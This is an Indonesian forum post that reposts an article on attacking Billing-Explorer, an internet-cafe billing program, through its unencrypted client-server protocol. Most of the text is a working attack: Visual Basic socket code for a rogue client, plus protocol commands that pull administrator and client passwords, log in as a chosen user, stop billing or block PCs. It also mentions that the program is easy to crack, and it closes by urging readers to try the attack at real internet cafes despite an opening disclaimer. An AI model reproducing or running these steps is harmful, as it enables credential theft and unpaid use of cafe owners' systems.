nembus billing
1395 days ago  Quote('42260','42260','6','7')">Report spamSaya menemukan sebuah artikel di vbbego.com dengan
judul "Memanfaatkan Kelemahan Billing-Explorer" yang ditulis Ajie,
untuk mengetahui cara Memanfaatkan Kelemahan Billing-Explorer maka
anda dapat menbaca artikelnya dibawah ini.
--[start]--
Memanfaatkan Kelemahan Billing-Explorer
Sebelumnya saya mohon maaf atas apa yang saya tulis pada artikel
ini, ini hanya bertujuan untuk menambah wawasan saja di bidang
keamanan sebuah program. Jadi penulis tidak bertanggung jawab atas
penyalah gunaan artikel ini.
KALO SETUJU SILAHKAN TERUSKAN BACA ARTIKELNYA, KALO NGGAK MENDINGAN
TUTP AJA.
Sebelum masuk ke inti permasalahan, ada yang perlu anda persiapkan:
- Coba download program demo nya di www.billingexplorer.com
Server program dan client program
- Setelah berhasil mendownload ke duanya, silahkan anda install
terlebih dahulu.
- Apabila proses installasi selesai, silahkan anda coba jalankan
kedua
program tersebut pada satu komputer.
- Jalankan program server terlebih dahulu kemudian program clientnya
- Secara default passwordnya akan berisi 008
- ok saya anggap anda semua udah bisa menjalankannya.
Nah apabila selesai proses diatas coba anda jalankan hanya program
servernya saja. Kita akan liat kelemahan yang terjadi pada
koneksinya.
Kalo kalian pake program packet snipper mungkin akan kelihatan, data
apa saja yang dikirim ke client.......Setelah diamati beberapa menit
dengan program packetsnipper ternyata setiap data yang dikirim ke
client melalui winsock tidak terproteksi atau dalam kata lain hanya
berupa plaintext saja...ops....ternyata....he...he....
Okeh kita lanjut lagi, jika dilihat pada data yang dikirim oleh
program server selalu diawali dengan 'YYY' dan sebaliknya apabila
dikirim dari client ke server akan diawali dengan 'XXX' (tanpa
curek).
("Mungkin hal seperti ini akan berakibat fatal, ini bisa kita
jadikan contoh bahwa data yang dikirim diusahakan harus terenkripsi
untuk menghindari dan meminimalisasi pencurian data2 yang berbentuk
plain text.")
Ada beberapa perintah yang dikirim dari client ke server seperti:
XXX$personal$2$HACKER$
kalo saya gak salah artikan perintah diatas, menjadi spt ini:
XXX -> Perintah dari client
$ -> sebagai seperator atau pemisah parameter
personal -> type login yang digunakan user
$ -> sebagai seperator atau pemisah parameter
2 -> No PC Client yang telah di setting
$ -> sebagai seperator atau pemisah parameter
HACKER -> Nama yang digunakan oleh user
Maka kesimpulannya kita bisa login ke program server tanpa program
client bawaanya dan kita bisa ganti dengan program kecil buatan
sendiri.
Coba anda buat satu project dengan:
1 form, 1 winsock control, 2 commandbutton dan 2 textbox
untuk text1 rubah properti Multiline=True dengan Scrollbars=Both
Private Sub Command1_Click()
SOCK.Close
'// Masukan IPAddress Servernya dengan Port 1500 (default port)
SOCK.Connect "192.168.0.1", "1500"
End Sub
Private Sub Command2_Click()
If SOCK.State = sckConnected Then SOCK.SendData Text2.Text
End Sub
Private Sub SOCK_DataArrival(ByVal bytesTotal As Long)
Dim Data As String
SOCK.GetData Data
Text1.SelText = Data & vbCrLf & String(50, "-") & vbCrLf
End Sub
setelah selesai koding diatas coba anda jalankan, lakukan koneksi
keserver dengan menekan tombol command1. Apabila berhasil koneksi ke
server coba anda tuliskan beberapa perintah dibawah ini pada
textbox2 dan diakhiri dengan menekan tombol Command2.
Perintah:
XXX$passY$2$
perintah diatas digunakan untuk melihat password client dan password
server pada PC Client No 2 (dua). hasil data yang dikirim dari
server ke client dengan menyertakan perintah diatas akan terlihat
seperti ini:
YYY$passY$008$Internet Millenium$JL. TAMAN INDAH NO-001 Surabaya 031-
7883542$Email info_008@... - http://www.billingexplorer.com$111
kalo dilihat pada kata '008' dan '111', ini dapat diartikan sebagai
password Administrator dan Password PC Client.
kita bisa klik tombol admin pada program clientnya, dan masukan
passwordnya. seperti yang terlihat pada gambar dibawah ini
[ http://www.vbbego.com/_images/_scr/bill1.gif ]
anda bisa mencoba beberapa perintah dibawah ini:
1. XXX$personal$2$HACKER$
(Login pada PC no 2 dengan nama user HACKER)
2. XXX$stop$2$HACKER
(untuk logout dari billing)
3. XXX$con$2$HACKER
4. XXX$infod2$2$
5. XXX$ablock$2$
6. XXX$admin$2$Admin
7. XXX$tutup$2$$
Anda bisa cari lagi perintah2 yg lain dengan menggunakan packet
snipper seperti 'EtherDetect Packet Sniffer'.
Selain itu ada beberapa kelemahan lain yang terdapat pada program
ini, seperti tidak diproteksinya file executable dengan program-
program compress exe, spt UPX,PE-COMPAT ataupun yg lain. ini sangat
memudahkan untuk di CRack.
Sekedar info, program yang saya coba adalah Billing-Explorer Ver
4.40 Grand R-14a. yang di compile dengan visual basic v 5.0
Jadi kalo jalan-jalan ke warnet dan kebetulan billing nya
menggunakan program ini, hmmm.m.m..mmmm...sekalian bisa
dicoba...nih...
Comments: 2 Views: 48051
| 
